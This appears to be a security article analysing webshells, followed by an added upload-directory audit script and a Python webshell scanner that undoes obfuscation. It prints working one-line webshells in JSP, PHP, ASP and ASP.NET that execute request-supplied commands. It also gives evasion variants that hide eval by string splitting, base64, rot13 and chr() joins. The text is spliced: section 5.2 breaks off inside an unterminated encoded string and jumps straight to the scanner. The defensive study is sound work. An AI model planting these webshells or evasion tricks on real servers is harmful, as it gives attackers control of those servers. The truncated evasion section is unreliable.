Cybersecurity: A Brief Analysis of Webshells
Word count 689, 2025-08-12 11:33:56

Webshells: A Brief Analysis and Defense Guide

1. Introduction

A webshell is a common attack technique: the attacker uploads a specific script file to the web server and thereby gains control of it. This article analyzes, from a technical angle, the preconditions for using a webshell, the characteristics of its payloads, how it works, and the ideas behind evading defenses, as a reference for security practitioners.

2. Preconditions for Webshell Use

Using a webshell usually requires one of the following conditions:

  • A file upload vulnerability exists (for example, the Spring remote command execution vulnerability CVE-2022-22965)
  • Server misconfiguration makes a file location writable
  • The application has a code injection vulnerability

Take CVE-2022-22965 as an example: the vulnerability is essentially a file write vulnerability, and an attacker can write a webshell to the server by constructing a specific payload. A typical payload contains a Java command execution call such as getRuntime().exec(request.getParameter("cmd")).
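Of the three preconditions above, the two that concern the filesystem can be verified directly by the server operator. The following audit is an added example, not code from the original post: it walks an upload directory and reports server-side script files found there as well as directories writable by any local user. The extension list, the finding names and the constructed demo tree are assumptions of this example.

```python
"""Upload-directory audit for the preconditions in section 2.

Added example, not from the original post. Two of the listed preconditions can
be checked on the server itself: script files the web server would execute
sitting in a directory meant for static uploads, and directories any local
account can write to. Paths, extension list and the demo tree are assumptions.
"""
import os
import stat
import tempfile

# Extensions the servers shown in section 3 execute as code (assumed list).
SCRIPT_EXTENSIONS = {".php", ".jsp", ".asp", ".aspx"}


def audit_upload_dir(root):
    """Walk an upload tree and return sorted (finding, path relative to root) pairs."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        rel_dir = os.path.relpath(dirpath, root)
        # A directory writable by "other" lets any local account drop a file into it.
        if os.stat(dirpath).st_mode & stat.S_IWOTH:
            findings.append(("world-writable-dir", rel_dir))
        for name in filenames:
            if os.path.splitext(name)[1].lower() in SCRIPT_EXTENSIONS:
                rel_file = os.path.normpath(os.path.join(rel_dir, name))
                findings.append(("script-in-uploads", rel_file))
    return sorted(findings)


def build_demo_tree():
    """Constructed sample tree: one harmless image, one stray .php file, one 0777 dir."""
    root = tempfile.mkdtemp(prefix="uploads-demo-")
    os.makedirs(os.path.join(root, "avatars"), mode=0o755)
    os.makedirs(os.path.join(root, "tmp"), mode=0o755)
    with open(os.path.join(root, "avatars", "user1.jpg"), "wb") as fh:
        fh.write(b"\xff\xd8\xff")  # JPEG magic bytes only; content is irrelevant here
    with open(os.path.join(root, "avatars", "user2.php"), "w") as fh:
        fh.write("<?php /* a script file has no business in an upload folder */ ?>")
    os.chmod(os.path.join(root, "tmp"), 0o777)  # the misconfiguration being audited
    return root


if __name__ == "__main__":
    demo = build_demo_tree()
    for kind, path in audit_upload_dir(demo):
        print(f"{kind:20} {path}")
```

Run against a real upload root instead of the demo tree, the same two findings are the ones to fix first: script files under an upload directory should be deleted or quarantined, and the directory should not be writable by accounts other than the one the web application runs as.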

3. Webshell Payload Examples

3.1 Webshell examples in each language

JSP Webshell:

<%
    Runtime.getRuntime().exec(request.getParameter("cmd"));
%>

PHP Webshell:

<?php @eval($_POST['123']);?>

ASP Webshell:

<%
    Set obj = Server.CreateObject("WScript.Shell")
    obj.Run(Request("cmd"))
%>

ASP.NET Webshell:

<%@ Page Language="C#" %>
<%
    System.Diagnostics.Process.Start(Request["cmd"]);
%>

4. How Webshells Work

Take the PHP one-line trojan as an example:

<?php @eval($_POST['123']);?>

How it works:

  1. Receive the value of the variable named '123' from the POST request
  2. Execute the contents of that variable with the eval function

Webshells in other languages work the same way: each relies on a function of that language that can run system commands directly in order to gain control.

5. Webshell Evasion Techniques

5.1 Hiding key functions

Examples of hiding PHP's eval function:

  1. Splitting and reassembling the string:
<?php 
    $a = "ev"."al";
    $a($_POST['cmd']);
?>
  2. Encoding:
<?php 
    // Base64 encoding
    eval(base64_decode('ZXZhbCgkX1BPU1RbJ2NtZCddKTs='));
    
    // rot13 encoding
    eval(str_rot13('riny($_CBFG[\'pqz\']);'));
    
    // chr() concatenation
    eval(chr(101).chr(118).chr(97).chr(108).'($_POST["cmd"])');
?>

5.2 Hiding commands

  1. Nested multi-layer encoding:
<?php 
    // Multiple layers of base64 encoding
    eval(base64_decode('
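The payload samples in section 3, the eval-of-a-POST-parameter principle in section 4 and the hiding tricks in section 5 all reduce to one pattern a defender can search for: an execution sink fed by request-controlled input. The following scanner is an added example, not code from the original post. It peels the string concatenation, base64_decode(), str_rot13() and chr() layers shown above (nested base64 included) before matching, and runs over a constructed sample set made of the post's own payloads plus two benign files. The sink and source lists, the function names and the sample files are assumptions of this example.

```python
"""Webshell signature scanner with de-obfuscation.

Added example, not from the original post. Flags a source file when an
execution sink (eval, exec, Runtime.exec, WScript.Shell, Process.Start ...)
appears together with request-controlled input, after undoing the hiding
techniques from section 5: string concatenation, base64_decode(), str_rot13()
and chr() joins. Regex lists and sample files are assumptions of this example.
"""
import base64
import codecs
import re

# Execution sinks for the four languages shown in section 3.
SINK_RE = re.compile(
    r"\b(eval|assert|system|shell_exec|passthru|exec|popen|proc_open)\b"
    r"|Runtime\.getRuntime\(\)\.exec"
    r"|WScript\.Shell"
    r"|System\.Diagnostics\.Process\.Start",
    re.IGNORECASE,
)
# Request-controlled sources: PHP superglobals, servlet request, ASP/ASP.NET Request.
SOURCE_RE = re.compile(
    r"\$_(POST|GET|REQUEST|COOKIE)\b|request\.getParameter|\bRequest\s*[\(\[]",
    re.IGNORECASE,
)

# One regex per hiding technique. Each replacement turns the obfuscated fragment
# back into a plain quoted string literal so the later passes can see through it.
CHR_RE = re.compile(r"\bchr\(\s*(\d{1,3})\s*\)", re.IGNORECASE)
B64_RE = re.compile(r'''base64_decode\(\s*(['"])([A-Za-z0-9+/=\s]+)\1\s*\)''', re.IGNORECASE)
ROT13_RE = re.compile(r'''str_rot13\(\s*(['"])((?:[^'"\\]|\\.)*)\1\s*\)''', re.IGNORECASE)
CONCAT_SQ = re.compile(r"'([^'\\]*)'\s*\.\s*'([^'\\]*)'")
CONCAT_DQ = re.compile(r'"([^"\\]*)"\s*\.\s*"([^"\\]*)"')


def _chr(m):
    n = int(m.group(1))
    if 32 <= n <= 126 and chr(n) not in "'\\":
        return "'" + chr(n) + "'"
    return m.group(0)


def _b64(m):
    try:
        raw = base64.b64decode(re.sub(r"\s", "", m.group(2)), validate=True)
        return "'" + raw.decode("utf-8") + "'"
    except (ValueError, UnicodeDecodeError):
        return m.group(0)  # not decodable text: leave the fragment as written


def _rot13(m):
    return "'" + codecs.decode(m.group(2), "rot_13") + "'"


def _concat(m):
    quote = m.group(0)[0]
    return quote + m.group(1) + m.group(2) + quote


PASSES = [("chr", CHR_RE, _chr), ("base64", B64_RE, _b64), ("rot13", ROT13_RE, _rot13),
          ("concat", CONCAT_SQ, _concat), ("concat", CONCAT_DQ, _concat)]


def deobfuscate(code, max_rounds=10):
    """Apply every pass until a fixed point. Returns (normalized code, names of layers peeled)."""
    used = set()
    for _ in range(max_rounds):
        new = code
        for name, pattern, repl in PASSES:
            new, count = pattern.subn(repl, new)
            if count:
                used.add(name)
        if new == code:
            break
        code = new
    return code, sorted(used)


def scan_source(code):
    normalized, decoders = deobfuscate(code)
    sinks = sorted({m.group(0) for m in SINK_RE.finditer(normalized)})
    sources = sorted({m.group(0) for m in SOURCE_RE.finditer(normalized)})
    return {
        "suspicious": bool(sinks and sources),  # sink AND attacker-controlled input
        "sinks": sinks,
        "sources": sources,
        "decoders": decoders,                   # which hiding layers were peeled
        "dynamic_call": bool(re.search(r"\$\w+\s*\(", normalized)),  # $a(...) call
    }


def scan_files(files):
    return {name: scan_source(code) for name, code in files.items()}


_ONE_LINER = "eval($_POST['cmd']);"
_DOUBLE_B64 = base64.b64encode(base64.b64encode(_ONE_LINER.encode())).decode()

# Constructed sample files: the post's payloads in each form, plus two benign files.
SAMPLES = {
    "plain.php": "<?php @eval($_POST['123']);?>",
    "concat.php": """<?php $a = "ev"."al"; $a($_POST['cmd']); ?>""",
    "b64.php": "<?php eval(base64_decode('ZXZhbCgkX1BPU1RbJ2NtZCddKTs=')); ?>",
    "rot13.php": r"<?php eval(str_rot13('riny($_CBFG[\'pqz\']);')); ?>",
    "chr.php": """<?php eval(chr(101).chr(118).chr(97).chr(108).'($_POST["cmd"])'); ?>""",
    "nested.php": "<?php eval(base64_decode(base64_decode('%s'))); ?>" % _DOUBLE_B64,
    "shell.jsp": '<% Runtime.getRuntime().exec(request.getParameter("cmd")); %>',
    "shell.asp": '<% Set obj = Server.CreateObject("WScript.Shell") : obj.Run(Request("cmd")) %>',
    "shell.aspx": '<%@ Page Language="C#" %><% System.Diagnostics.Process.Start(Request["cmd"]); %>',
    "search.php": "<?php echo htmlspecialchars($_GET['q']); ?>",
    "banner.php": "<?php echo base64_decode('aGVsbG8='); ?>",
}

if __name__ == "__main__":
    for name, r in scan_files(SAMPLES).items():
        flag = "SUSPICIOUS" if r["suspicious"] else "clean"
        print(f"{name:12} {flag:10} sinks={r['sinks']} sources={r['sources']} decoders={r['decoders']}")
```

Two design points matter for a scanner like this. First, the verdict is the co-occurrence of a sink and a source after normalization, not the presence of eval or base64_decode alone, which is why the benign banner.php (a base64 string, no sink, no request input) stays clean. Second, every decoder rewrites the fragment into a quoted literal, so layers compose: the concatenation pass reads the chr() output, and a second base64 pass reads the first one's output, which is exactly how the "nested multi-layer encoding" variant is unwrapped.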